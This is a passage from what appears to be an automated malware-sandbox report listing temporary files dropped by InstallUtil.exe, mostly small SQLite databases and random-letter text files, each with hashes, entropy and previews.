                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpB8D2.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpB94F.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690299109915258
                                                            Encrypted:false
                                                            SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                            MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                            SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                            SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                            SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                            Malicious:false
                                                            Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                            C:\Users\user\AppData\Local\Temp\tmpB950.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696178193607948
                                                            Encrypted:false
                                                            SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                            MD5:960ECA5919CC00E1B4542A6E039F413E
                                                            SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                            SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                            SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                            Malicious:false
                                                            Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                            C:\Users\user\AppData\Local\Temp\tmpB960.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6998645060098685
                                                            Encrypted:false
                                                            SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                            MD5:1676F91570425F6566A5746BC8E8427E
                                                            SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                            SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                            SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                            Malicious:false
                                                            Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                            C:\Users\user\AppData\Local\Temp\tmpB961.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690299109915258
                                                            Encrypted:false
                                                            SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                            MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                            SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                            SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                            SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                            Malicious:false
                                                            Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                            C:\Users\user\AppData\Local\Temp\tmpB962.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696178193607948
                                                            Encrypted:false
                                                            SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                            MD5:960ECA5919CC00E1B4542A6E039F413E
                                                            SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                            SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                            SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                            Malicious:false
                                                            Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                            C:\Users\user\AppData\Local\Temp\tmpB963.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6998645060098685
                                                            Encrypted:false
                                                            SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                            MD5:1676F91570425F6566A5746BC8E8427E
                                                            SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                            SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                            SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                            Malicious:false
                                                            Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                            C:\Users\user\AppData\Local\Temp\tmpEEE6.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEEE7.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEEF8.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEEF9.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEF0A.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEF1A.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEF2B.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEF3C.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEF4C.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
